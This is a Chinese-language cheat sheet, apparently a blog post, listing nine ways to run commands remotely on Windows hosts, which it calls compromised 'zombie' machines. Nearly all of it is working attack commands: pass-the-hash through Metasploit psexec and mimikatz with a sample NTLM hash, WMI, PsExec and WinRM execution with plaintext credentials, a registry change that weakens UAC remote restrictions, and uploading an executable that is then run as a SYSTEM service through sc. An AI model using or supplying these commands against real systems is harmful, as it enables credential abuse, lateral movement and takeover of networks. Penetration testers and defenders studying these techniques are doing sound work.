windows遠程執行cmd命令的9種方法

一、遠程執行命令方式及對應端口:

 IPC$+AT 445
 PSEXEC 445
 WMI 135
 Winrm 5985(HTTP)&5986(HTTPS)

二、9種遠程執行cmd命令的方法：

1.WMI執行命令方式,無回顯：

wmic /node:192.168.1.158 /user:pt007 /password:admin123  process call create "cmd.exe /c ipconfig>d:\result.txt"

2.使用Hash直接登錄Windows（HASH傳遞）

抓取windows hash值,得到administrator的hash：
598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf調用payload：
use exploit/windows/smb/psexec 
show options
set RHOST 192.168.81.129
set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
set SMBUser Administrator
show options
run

3. mimikatz傳遞hash方式連接+at計划任務執行命令：

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //傳遞hash
dir \\192.168.1.185\c$

4.WMIcmd執行命令,有回顯：

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"

程序下載地址：
https://github.com/nccgroup/WMIcmd/releases

5.Cobalt strkie遠程執行命令與hash傳遞攻擊:

 6.psexec.exe遠程執行命令

psexec /accepteula //接受許可協議
sc delete psexesvc
psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

7.psexec.vbs遠程執行命令

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"

8.winrm遠程執行命令

//肉機上面快速啟動winrm服務，並綁定到5985端口：
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano|find "5985"
//客戶端連接方式：
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd
//UAC問題,修改后，普通管理員登錄后也是高權限:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

9.遠程命令執行sc

//建立ipc連接(參見net use + at)后上傳等待運行的bat或exe程序到目標系統上，創建服務（開啟服務時會以system 權限在遠程系統上執行程序）：

net use \\192.168.17.138\c$ "admin123" /user:pt007
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
sc \\192.168.17.138 create test binpath= "c:\test.exe"
sc \\192.168.17.138 start test
sc \\192.168.17.138 del test